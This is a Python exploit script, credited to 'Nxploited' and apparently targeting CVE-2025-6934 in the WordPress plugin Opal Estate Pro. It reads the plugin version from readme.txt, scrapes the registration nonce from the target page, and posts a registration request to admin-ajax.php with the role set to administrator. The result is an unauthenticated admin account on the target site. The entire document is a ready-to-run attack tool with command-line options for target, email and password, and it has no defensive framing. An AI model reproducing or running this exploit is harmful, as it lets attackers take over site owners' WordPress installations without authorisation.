import argparse import requests import re import time from urllib.parse import urljoin from bs4 import BeautifulSoup import json # By: Khaled_alenazi (Nxploited) requests.packages.urllib3.disable_warnings() user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" headers = {"User-Agent": user_agent} def check_version(base_url): readme_url = urljoin(base_url, "/wp-content/plugins/opal-estate-pro/readme.txt") try: response = requests.get(readme_url, verify=False, timeout=10) if response.status_code == 200: match = re.search(r"Stable tag:\s*([\d\.]+)", response.text) if match: version = match.group(1) print("\n[•] Plugin Version Check:") if version <= "1.7.5": print(f" [+] Vulnerable version detected: {version}") else: print(f" [-] Version may not be vulnerable: {version}") else: print(" [-] Stable tag not found in readme.txt") else: print(" [-] Could not access readme.txt") except Exception as e: print(f" [-] Error: {e}") def get_nonce(base_url): try: response = requests.get(base_url, verify=False, timeout=10, headers=headers) soup = BeautifulSoup(response.text, "html.parser") input_tag = soup.find("input", {"name": "opalestate-register-nonce"}) if input_tag: return input_tag.get("value") else: return None except: return None def exploit(base_url, email, password): print("\n[•] Exploit Attempt Started") nonce = get_nonce(base_url) if not nonce: print(" [-] Failed to retrieve nonce") return print(f" [+] Nonce Found: {nonce}") target = urljoin(base_url, "/wp-admin/admin-ajax.php") data = { "username": "nxploitedadmin", "email": email, "password": password, "password1": password, "role": "administrator", "confirmed_register": "on", "opalestate-register-nonce": nonce, "_wp_http_referer": "/", "ajax": "1", "action": "opalestate_register_form" } try: response = requests.post(target, data=data, verify=False, headers=headers) print(f" [+] HTTP Status: {response.status_code}") try: result = response.json() if result.get("status") is True: print("\n[✔] Exploit Successful!") print(" --------------------------") print(f" Username : nxploitedadmin") print(f" Email : {email}") print(f" Password : {password}") print(f" Role : administrator") print(" --------------------------") else: print("\n[✖] Exploit Failed!") message = result.get("message", "") clean_msg = BeautifulSoup(message, "html.parser").get_text().strip() print(f" Reason: {clean_msg}") except json.JSONDecodeError: print("\n[✖] Unexpected response (non-JSON):") print(response.text) except Exception as e: print(f" [-] Exploit Error: {e}") print("\nExploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited") parser = argparse.ArgumentParser(description="CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)") parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., http://site.com/path/)") parser.add_argument("-mail", "--newmail", required=True, help="Email to register as admin") parser.add_argument("-password", "--newpassword", required=True, help="Password for new admin user") args = parser.parse_args() check_version(args.url) exploit(args.url, args.newmail, args.newpassword)